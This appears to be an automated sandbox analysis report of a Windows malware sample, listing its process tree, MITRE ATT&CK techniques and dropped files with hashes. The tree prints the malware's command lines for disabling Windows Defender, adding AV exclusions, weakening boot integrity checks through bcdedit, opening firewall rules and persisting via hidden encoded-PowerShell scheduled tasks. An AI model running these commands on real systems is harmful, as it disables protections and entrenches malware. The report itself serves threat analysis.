      "C:\Users\Admin\Pictures\VNg2XgrhtLvzc6ZQLgmlPtMG.exe"
      4⤵
      Executes dropped EXE
      Checks for VirtualBox DLLs, possible anti-VM trick
      Suspicious behavior: EnumeratesProcesses
      PID:2256
- - C:\Users\Admin\Pictures\d7zkODciX9qGiSBDVgCwciil.exe
    "C:\Users\Admin\Pictures\d7zkODciX9qGiSBDVgCwciil.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1976
  - - C:\Users\Admin\Pictures\d7zkODciX9qGiSBDVgCwciil.exe
      "C:\Users\Admin\Pictures\d7zkODciX9qGiSBDVgCwciil.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Loads dropped DLL
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2152
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2560
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Manipulates WinMon driver.
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        Modifies data under HKEY_USERS
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2924
      - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:324
      - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:1624
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1992
      - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        
        PID:2820
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2216
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1084
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2292
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2068
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1028
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2612
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1892
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1604
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1456
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:880
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:548
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2436
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2296
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:320
      - C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        6⤵
        Executes dropped EXE
        
        PID:1596
      - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:2084
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        Executes dropped EXE
        
        PID:2056
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:2072
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:1172
- - C:\Users\Admin\Pictures\JG0VcbHAmHiysTLswUyQn41j.exe
    "C:\Users\Admin\Pictures\JG0VcbHAmHiysTLswUyQn41j.exe"
    3⤵
    - Executes dropped EXE
    PID:616
- - C:\Users\Admin\Pictures\20JVE3uO8rUulGwiD48JppRS.exe
    "C:\Users\Admin\Pictures\20JVE3uO8rUulGwiD48JppRS.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1884
  - - C:\Users\Admin\AppData\Local\Temp\7zS843D.tmp\Install.exe
      .\Install.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1584
    - - C:\Users\Admin\AppData\Local\Temp\7zS8C29.tmp\Install.exe
        
        .\Install.exe /JPdidKxawB "385118" /S
        5⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Loads dropped DLL
        Checks for any installed AV software in registry
        Drops file in System32 directory
        Enumerates system info in registry
        
        PID:1772
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        6⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        7⤵
        
        PID:1616
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        8⤵
        
        PID:1344
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        8⤵
        
        PID:1936
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        6⤵
        
        PID:1608
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        7⤵
        
        PID:2664
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        8⤵
        
        PID:1944
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        8⤵
        
        PID:2556
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "glxdAhHlF" /SC once /ST 13:27:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        6⤵
        Creates scheduled task(s)
        
        PID:2192
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "glxdAhHlF"
        6⤵
        
        PID:2856
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "glxdAhHlF"
        6⤵
        
        PID:1576
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bvgvHgqNgKCzXIKVFa" /SC once /ST 20:53:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\RXpBNGY.exe\" Lc /Fosite_idWwX 385118 /S" /V1 /F
        6⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:2624
- - C:\Users\Admin\Pictures\QSP1mZCKb50xeOQ0DG0q7HFV.exe
    "C:\Users\Admin\Pictures\QSP1mZCKb50xeOQ0DG0q7HFV.exe" --silent --allusers=0
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:400
- - C:\Users\Admin\Pictures\tnmS1TzSKe9J8mB78miReTHx.exe
    "C:\Users\Admin\Pictures\tnmS1TzSKe9J8mB78miReTHx.exe" /VERYSILENT
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2284

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240204205101.log C:\Windows\Logs\CBS\CbsPersist_20240204205101.cab
1⤵
- Drops file in Windows directory
PID:2304

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:1916

C:\Users\Admin\AppData\Local\Temp\is-F5L1C.tmp\tnmS1TzSKe9J8mB78miReTHx.tmp
"C:\Users\Admin\AppData\Local\Temp\is-F5L1C.tmp\tnmS1TzSKe9J8mB78miReTHx.tmp" /SL5="$150122,831488,831488,C:\Users\Admin\Pictures\tnmS1TzSKe9J8mB78miReTHx.exe" /VERYSILENT
1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
PID:1564

C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
- Modifies data under HKEY_USERS
PID:1916

C:\Windows\system32\taskeng.exe
taskeng.exe {2A85A44D-677F-4896-AE83-E37BC717A340} S-1-5-21-1603059206-2004189698-4139800220-1000:AILVMYUM\Admin:Interactive:[1]
1⤵
PID:2948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:992
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2648
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:1312

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1476

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1188

C:\Windows\system32\taskeng.exe
taskeng.exe {F2808D26-6CC4-4074-B2B3-7DECCC32CC6E} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1900
- C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\RXpBNGY.exe
  C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\RXpBNGY.exe Lc /Fosite_idWwX 385118 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:2680
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "guEcoajar" /SC once /ST 02:45:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1956
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "guEcoajar"
    3⤵
    PID:620
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "guEcoajar"
    3⤵
    PID:880
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:2672
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2104
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:1100
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1976
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gFKOYKDoW" /SC once /ST 05:44:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1336
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gFKOYKDoW"
    3⤵
    PID:640

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1920

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
d1c72306ffd7d5ebd7b33c06c0f90b5b

SHA1
29491961f7906b4460e473eca0ada595eb503637

SHA256
63b43b21cdee47d60b0ef771c5ca023cc4f083a50982e49a9f24ab9be3b5f588

SHA512
d1b6bee730ea7e362c48a55b3357431348b6876f09c7c55cfe27df981d02644fd99dfb7c2b26b9b0358794fece3f47d4ab55af01592e495db357a0bcf5ac95d5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
96c642676f76853f3ba857dad9a39e1d

SHA1
a13c054c76c5bc67795d6b61b095064338973257

SHA256
7017d14a245c1e02dfa0f6660203db42303b80108444c1403321f75446c2bc42

SHA512
8a511001f25b01a8062458a3b47b091d8371f5b74ae1cbf4df474b0f627a27391a22d971be110aea92893c3577847439bdd89c80a43f6d0209dad7642583d7b6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
c08684bd4c93c5b482485fc6ca2ec2a5

SHA1
aaae99211acb1a108ccec5734c4e375c6f776b0c

SHA256
063c2d41098517b6edea874e119d744990819d8d38dc68842b0d2a0b4bc6d2e6

SHA512
772bacb2aa699a1a4891811235ef19ea5be9be3e14bb5d50b01df8a5eb72481f9d324c2c881c0a1aa5d2b4c5510b2cdb6e4f87673e653d869664efcec25be5fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS843D.tmp\Install.exe

Filesize
123KB

MD5
9253bc90888fde53cb77b0270cd6c595

SHA1
bcb52c119b41f068e6f294d3dcddef3daffc9499

SHA256
5a200e2f135497d701f6a49294a613af56fa036df97309353c33d8c4e71a6f09

SHA512
342afb98e18a1e5f02616766d957e6a838407f9b0104e888eb82e64a3a3c6885ee61826576989be9c3aa70e7d840879efc42483bf68a3e135b5bf40ca2393828

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS843D.tmp\Install.exe

Filesize
102KB

MD5
7d23290c18aa6b6fea13679084777285

SHA1
bf7bda414c1c3f0e5b3fa6e826b1abe32ff7ecdb

SHA256
1923b3fd8022c611981b6ea9eb4a94cd32f84a4d0ae282edbe2f20662374131f

SHA512
4091682fdaac1d75a04f459e7b1f38fcaaf1afad4077686e58c6be13af7ebebcad4f017b591e96faca408ff18ad9825940cc5870a3d20fba562f95919047621e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8C29.tmp\Install.exe

Filesize
145KB

MD5
367db59eab52bb887ad017345dc4ecbc

SHA1
a8efc22a833f0c39078f155c88847ee86054e966

SHA256
a1f96e01306ba786c6e09bdfebf8c990be4119ea12e65f1c90495e7e7b4e6cab

SHA512
9259158cc2d4ed1422c04556144b2076cae85c729642718ba6f95e2713fcd650519e1bf9cdb2194f60f747b007b856a816888c5074865c7c139ae6d21aae0e0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8C29.tmp\Install.exe

Filesize
340KB

MD5
900280417b225ca7b1eeef04e103d5cd

SHA1
18f513414e5fb868dc0b04ca8783a2b6ca2d6d99

SHA256
9575e66379770d5edb6f736d4205db33f4b5b37e66080535141cdd4c778078e6

SHA512
e7b55593d257d8f162ff4c42c8cf773ed56852ffd1b13c5c9b88244d66ba65fe83d6df96d31d24c2ec1e14c85811105f47798464b88c0c475a506e895c6328cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab4DC4.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\RXpBNGY.exe

Filesize
6.7MB

MD5
a753e98025c49aa8b62d48355f6f5637

SHA1
69b6724fec877f1bef1362140467cad5b96a2dfc

SHA256
d6764c1ff829ebf133600f06ed480cd01f61ed38f519414e1ce8c07a05c09f65

SHA512
303efd7452ec38bbad7ae00faa8209794bd0ba6d559ca416527b1da19546ef33dca3da76a91e4cef85c1af152682669ca5c9fd14d09c699a206cc64cac5cc399

Download Submit
C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\RXpBNGY.exe

Filesize
5.0MB

MD5
a1bb30227a7800d75a971e66e4141aab

SHA1
d7e5ab5db87287cb4d4572545d981a543c968823

SHA256
a273d9d14a0c53ef77fcfbd3c8d34a2d0e391dca80851ab3c11a8ba733c01888

SHA512
5abefc25486b41099ce680aa83424cee5baec5211d8d1ad1c41b17062f3fa2798d5a3ae20f584d5104d1c7ac1fe17a829cf1a08e42b733b829243ebb01b0c240

Download Submit
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

Filesize
1.3MB

MD5
7b97f859846375703a35a5baeef71a90

SHA1
fa9e6c2d881257781bbc1f30578ac11a08a65642

SHA256
9753187f6e32e696d6d518189245dc512bc10c1cee7ff4b9d3aa7832e51f0886

SHA512
afedba2746f31d6bb7a173bfdc292cb8b58ca05ee8e2ff9fb990e2aa0dd6c93261d601f1f552151d89386966e65026897f08402e040fe2c569e83ccb978ea9eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

Filesize
492KB

MD5
fafbf2197151d5ce947872a4b0bcbe16

SHA1
a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020

SHA256
feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71

SHA512
acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4F9B.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

Filesize
123KB

MD5
9e44bd1a86fc2bae61b4c326617c517d

SHA1
ffff7da7a4de6d4f9a7452761e045ebd381aa8bf

SHA256
40b88a6fff7223cdb2b1f2376f1584b4c2205e50c012cab00df7b7e0dc6f02d4

SHA512
cf3baf750e2586179bf7207e5eb5f59e18767a321200d5875ba18b142d8e2898278529cae9c04042a3fbcebf4088a3dc31e47365f032d767d6d24ab191a1e9a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Filesize
72KB

MD5
e2d68ce272854d924bdc88f889e2c2f5

SHA1
4b1f5fc6894ce454394db08f2d8a48b35624f4dd

SHA256
064181a2b0caee01176210c80001b3d2bea05f076216b73f4a8dd0f82dfe8602

SHA512
0906de24b98ed62dd2236b0a2a80e2b86150a5dec84d282d5c0b8640277be5c4e667f150d944ef5a5d5d9f2833264325c1876546307cac4d034c4a5f7412f86a

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-F5L1C.tmp\tnmS1TzSKe9J8mB78miReTHx.tmp

Filesize
8KB

MD5
aa52a1d0e0f7813db0634cb787c86c3d

SHA1
f5e40b88575a6e55586e6fbbc0ee172899088c39

SHA256
e5732a481152fa364fe76b94e4c9ca9d5d1052fcce23d09523326a0fa6467be4

SHA512
e0887fd69f864e246b622692b313a668048db9814665243818ae752909d01cc1cb0725b9b8daa87e3081b90686598bcbb34fd3b2a554ed40b402f026036aa56f

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-F5L1C.tmp\tnmS1TzSKe9J8mB78miReTHx.tmp

Filesize
131KB

MD5
40ac2b4c935d5d08aee1618bb19b049a

SHA1
fdc9888ce1181b4b8738cbcf15a07f1a3ea7ade5

SHA256
f4f38c560fe80015281b84c62d9deb02675b89ec3128af3576ceefa78c6391aa

SHA512
d986e02f73149651aa74951813cd23f1225400bef5e8409127c2cba73fc7fcdd86e2067d8f6acf48f82ad9292880b102c620c82d89a923040f5d6bb2e5f22f99

Download Submit
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
1KB

MD5
f469e3084fb0a4b03073a4db681efa44

SHA1
828fa36a3a8c8e91dfbb00e6c2e5e5d3c4a3eea6

SHA256
c56ff3aa9da4dda7696ff44c02b9d73321e6753eb1cdf0039f1a97dd18b2fbf0

SHA512
d17a892bacdc9d5e91d9dd3ca296846251b017d48c2547dfa49a2ef769100191bffacb53cc2d7ac2a11b090bae35b24102435cffb18c558d0d11c9a8aebbf0c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\osloader.exe

Filesize
512KB

MD5
869f9baf6fb800859f0d0a4f92faa5c1

SHA1
e83651b608daad05c635758257cd36c9b75b2328

SHA256
2cb08430ecad776182cc5404e2edd620e84d47d8c75bebfda9038f0561f70b7f

SHA512
96711aec22453ca7d49bae73309fb3abc49f709fa260d2f1969f166abe7c28294ff22779a9905de7aac7c19f273d263f13433d6e9b027b2c2d6eb8244432006b

Download Submit
